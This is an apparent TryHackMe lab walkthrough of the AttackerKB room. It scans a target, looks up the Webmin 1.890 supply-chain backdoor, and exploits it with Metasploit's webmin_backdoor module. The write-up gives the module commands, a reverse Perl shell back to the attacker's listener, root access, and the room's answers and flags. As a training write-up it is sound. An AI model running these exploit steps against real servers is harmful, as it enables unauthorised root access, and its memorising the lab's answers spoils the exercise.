Learn how to leverage AttackerKB and learn about exploits in your workflow!

AttackerKB

💢 We will cover the topics

  • Network Enumeration
  • Webmin 1.890 Exploit
  • Metasploit (webmin_backdoor)

I’m attacking what now?

Ever caught wind of a new vulnerability on Twitter or found something weird when examining a box? Fear no more, AttackerKB is here to make sense of it all! Throughout this room, we’ll be examining how we can leverage AttackerKB both as an attacker and defender to gain further insight into the ever-changing landscape of vulnerabilities.

A standalone version of the virtual machine used in this room can be found in this room. Additionally, you can download the OVA of Source for offline usage from https://www.darkstar7471.com/resources.html

  1. Read the above and move onto task two!

No answer needed

Discovering the Lay of the Land

In this specific task, we’ll be starting with the perspective of an attacker in a black-box assessment. Start by deploying and scanning the box in order to discover what has been installed.

  1. Deploy the virtual machine attached to this task. This deployment period will take about two minutes at the most.

No answer needed

  1. Scan the machine with Nmap. What non-standard service can be found running on the high-port?
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-26 14:47 CEST
Nmap scan report for 10.10.129.211
Host is up (0.076s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
|   256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_  256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open  http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.68 seconds

Webmin

  1. Further enumerate this service, what version of it is running?

1.890

  1. Visit the webpage generated by this service. You should encounter an error due to SSL being present. Change the URL to use HTTPS and ignore the exception. After this, view the certificate. What hostname can we find on the cert details? On Firefox, you can view this by clicking on the ‘i’ in the URL, then the ‘>’ in Connection, ‘More Information’, and then ‘View Certificate’ on the Security tab.

source

  1. Adjust your /etc/hosts file accordingly to include the newly discovered hostname and revisit the webpage in question. Note, that this will confirm that the service we previously discovered using Nmap is correct. Once you’ve done this, move onto task three.

No answer needed

Learning to Fly

Now that we’ve discovered a strange service running on our target, let’s move onto further research to discover possible exploits and how valuable they might be with AttackerKB.

  1. First, let’s navigate to AttackerKB! For our purposes, think of AttackerKB as similar to Exploit-DB but with a higher degree of information surrounding vulnerabilities and the exploits therein associated with them.

The AKB dashboard at the time of writing. Note, we won’t have to log in for what we’re doing. That being said, logging in (via GitHub OAuth) allows us to post and contribute to discussions surrounding vulnerabilities.

  1. AKB allows us to search for various vulnerabilities via the search bar at the top right of the site. Search now for ‘Webmin’ and click on ‘password_change.cgi’
  1. Take a look through the Assessments for this vulnerability. As an attacker, we can use the information posted here by other members to determine how value an exploit might be and any tweaks we might have to make to exploit code. Similarly, as a defender we can leverage these comments to gain additional situational information for vulnerabilities, allowing us to gauge how quickly we need to patch them. Which version of Webmin is immediately vulnerable to this exploit?

1.890

  1. What type of attack was this? Note, we’re looking for how this was added to the code for Webmin, not how this results in remote code execution (RCE).

supply chain

  1. Can you find a link to a post on the webmin’s website explaining what happened? What day was Webmin informed of an 0day exploit?

August 17th 2019

  1. Last but certainly not least, let’s find the link to our exploit. We can see in the Assessments that a Metasploit module was added for this backdoor. What pull number was this added in?

12219

  1. Once you’ve located the exploit, let’s move onto task four!

No answer needed

Blasting Away

Now that we’ve gained some insight into the vulnerability and its associated exploit that we’ve discovered, let’s move back into the scope of an attacker. In this task we’ll be leveraging Metasploit. If you have any difficulties here, I suggest checking out the RP: Metasploit room

  1. Launch Metasploit now as we’ll be leveraging the Metasploit module for this exploit.
1

msfconsole
  1. With Metasploit open, search for and select the exploit we previously investigated.
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

msf5 > search webmin

Matching Modules
================

   #  Name                                         Disclosure Date  Rank       Check  Description
   -  ----                                         ---------------  ----       -----  -----------
   0  auxiliary/admin/webmin/edit_html_fileaccess  2012-09-06       normal     No     Webmin edit_html.cgi file Parameter Traversal Arbitrary File Access
   1  auxiliary/admin/webmin/file_disclosure       2006-06-30       normal     No     Webmin File Disclosure
   2  exploit/linux/http/webmin_backdoor           2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor
   3  exploit/linux/http/webmin_packageup_rce      2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution
   4  exploit/unix/webapp/webmin_show_cgi_exec     2012-09-06       excellent  Yes    Webmin /file/show.cgi Remote Command Execution
   5  exploit/unix/webapp/webmin_upload_exec       2019-01-17       excellent  Yes    Webmin Upload Authenticated RCE

2 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor

1

msf5 > use 2
  1. Now that we’ve selected our exploit, set the options provided appropriately. Beyond RHOSTS and LHOST, what is the third option we must set to ‘True’?
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

msf5 exploit(linux/http/webmin_backdoor) > options

Module options (exploit/linux/http/webmin_backdoor):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path to Webmin
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)

msf5 exploit(linux/http/webmin_backdoor) > set RHOSTS 10.10.129.211
RHOSTS => 10.10.129.211
msf5 exploit(linux/http/webmin_backdoor) > set LHOST 10.8.106.222
LHOST => 10.8.106.222
msf5 exploit(linux/http/webmin_backdoor) > set SSL true
SSL => true

SSL false no Negotiate SSL/TLS for outgoing connections

  1. Run the exploit. What is the user flag?
1
2
3
4
5
6

msf5 exploit(linux/http/webmin_backdoor) > run

[*] Started reverse TCP handler on 10.8.106.222:4444
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.8.106.222:4444 -> 10.10.129.211:37060) at 2020-09-26 15:26:45 +0200

1

python -c "import pty; pty.spawn('/bin/bash')"

1
2
3
4
5
6
7
8
9

root@source:/usr/share/webmin/# find / -name user.txt
find / -name user.txt
/home/dark/user.txt
root@source:/usr/share/webmin/# cat /home/dark/user.txt
cat /home/dark/user.txt
THM{SUPPLY_CHAIN_COMPROMISE}
root@source:/usr/share/webmin/# cat /root/root.txt
cat /root/root.txt
THM{UPDATE_YOUR_INSTALL}

THM{SUPPLY_CHAIN_COMPROMISE}

  1. How about the root flag?

THM{UPDATE_YOUR_INSTALL}

  1. Once you’ve completed gaining the root flag, move onto the fifth and final task.

Going Further

Want to get even more out of AttackerKB? Check out the AKB Explorer by Horshark! Written in python, AKB Explorer provides similar functionality to Searchsploit, expanded to encompass the features of AKB. Using this tool, you can search by name, CVE, and username for posts! Check it out here: Link

  1. Read the above and keep learning!

No answer needed